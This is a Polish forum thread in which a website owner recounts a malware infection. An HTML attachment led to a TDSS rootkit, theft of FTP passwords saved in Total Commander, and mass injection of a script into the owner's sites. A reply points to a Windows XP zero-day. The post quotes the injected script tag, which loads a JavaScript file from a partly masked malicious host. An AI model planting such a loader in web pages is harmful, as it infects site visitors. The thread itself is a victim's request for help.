Witam,

Czy jest możliwe, że po wejściu na stronę www, na której znajduje się złośliwy
kod JS typu:

<script type="text/javascript"
src="http://blog.XXXXXXomestore.com:8080/File.js"></
script>

doszło do tak poważnych szkód jak:

1. istalacja w systemie trojana
2. instalacja root-kita, który ukrywa trojana
3. kradzież haseł do licznych kont FTP z ustawień Total Commandera!
4. wklejenie złośliwego kodu JS do setek plików na wszystkich serwerach do
których udało się robotowi zalogować dzięki ukradzionym tak hasłom do FTP.
Masakra!

Bo wczoraj tak się właśnie u mnie stało - mimo, ze cały czas działał Kaspersky.
Nie wiem tylko czy rzeczywiscie było tak, jak myślę, czy może zagrożenie wdarło
się inaczej?

Z moje strony wyglądało to tak:

1. Otrzymałem mailem czystko tekstowy (ASCII) załącznik .html

2. Skopiowałem go na pulpit i przeksnowałem antywirem - czysty.

3. Otworzyłem go EditPlusem, w środku zobaczyłem tylko taki kod JS jak wyżej.

4. Dibaeł mnie skusić, aby to odpalić pod FireFox - odpaliłem.

5. Kaspersky (heuristic) podniósł alarm, że złośliwy kod i że ZOSTAŁ
ZABLOKOWANY.

6. Myślałem więc, że nic sie nie stało i chyba się myliłem. Ale wtedy jeszcze
nie zauważyłem nic.

7. Wyłączyłem kompa i poszedłem do pracy.

8. Wróćiłem, odpalam kompa i zaczęły się pojawiać dość subtelne objawy infekcji,
mianowicie:

a) podczas wyszukiwania czegokolwiek w Google Kaspersky alarmwował, że
blokuje jakieś adresy Phishingowe.

b) w "msconfig" / "autostart" pojawiła sie pozycja wwwamq32.exe, której nie
dawało się wyłączyć (tzn. dawało sie, ale włączała sie spowrotem".

9. Zapuściłem skan Kasperskim i wykrył w pamieci RAM obecnosc rootkita
Rootkit.Win32.TDSS.bgqo. Probował go usuwać - wymuszajac podczas tej procedury
restart systemu, ale bezskutecznie.

10. Dopiero Kaspersky odpalony spod innego systetmu znalazł i usunął szkodnika w
3 miejscach:
http://www.medfoto.pl/img/rootkit.png

Myślałem, że już po sprawie, ale to był dopiero początek...

Wszedłem na jedną ze stron, które prowadzę i Kapsersky podniósł alarm, ze
zablokował na niej złośliwy skrypt. Zalogowałem sie przez FTP i zobaczyłem, że
wszelkie pliki index.php, wszystkie pliki *.js i trochę innych, zostało
zmodyfikowanych - dopisany do nich został cytowany na początku kod JS.

Pół nocy siedziałem i wywalałem złośliwy kod.
Na szczęście w tych godzinach ruch na stronach znikomy, ale pewnie parę osób się
zaraziło, nie wiem tylko jak poważnie, czy w taki sam sposób jak mój komp
pierwotnie (przypomnę, że ja odpaliłem plik z kodem JS lokalnie, a nie z netu -
być moze to czyni różnicę?).

W międzyczasie Kaspersky przestał blokować strony na których złośliwy kod
jeszcze był. Wygląda na to, że mają one z góry ustaloną na krótki czas
żywotność.

Oczywiście zmieniłem jeszcze wszystkie hasła, w tym hasła do baz SQL, które
przecież po zalogowaniu się przez FTP robot mógł ukraść z plików config. forum
phpBB.

Dla mnie morał jest taki, że nie wolno trzymać haseł do kont FPT zapisanych w
kliencie FTP. Trzeba je mieć w głowie.

Swoją drogą - nie wiem jeszcze, czy wirus ten nie ukradł też jakichś innych
haseł, np. zapisanych w przeglądarkach www. Tych na szczęście miałem mało,
głównie do jakichś Forum, gdzie mam uprawnienia szargo użytkownika.

Ale powtórzę pytanie początkowe - czy to wszystko mogło sie zacząć od
"niewinnego" kodu JS? Czy JS ma taki potencjał, że moze zmusić przeglądarkę do
zainstalowania takiego syfu bez zgody użytkownika? Przecież rootkit, to niemal
jak driver systemowy. Zapewniam, że nie byłem pytany o żadne potwierdzenia.
Wszystko się zainstalowało po cichu (Win XP, kotno z uprawnieniami admina).

Jeśli to się zaczęło przez JS, to jestem przerażony...
Jeśli inaczej - to jestem załamany, że nie wiem jak.
Przypomnę - Kaspersky działał, a nawet ostrzegał i niby mówił, że coś tam
blokuje, ale jednak z zerowym efektem!

Dzięki,

latet

do góry

latet pisze:
> Jeśli to się zaczęło przez JS, to jestem przerażony...
> Jeśli inaczej - to jestem załamany, że nie wiem jak.
> Przypomnę - Kaspersky działał, a nawet ostrzegał i niby mówił, że coś
> tam blokuje, ale jednak z zerowym efektem!

Nie znam się na tym ale: http://tiny.pl/htsmq .

"Niedawno odnaleziona i upubliczniona przez inżyniera Google'a - Tavisa
Ormanda - luka bezpieczeństwa w systemie Windows XP, jest wykorzystywana
przez hakerów w atakach zero-day. Według firmy SophosLabs, zainfekowana
strona internetowa wykorzystuje ową lukę do umieszczania koni
trojańskich w komputerach nic niepodejrzewających użytkowników."

--
kamil d

do góry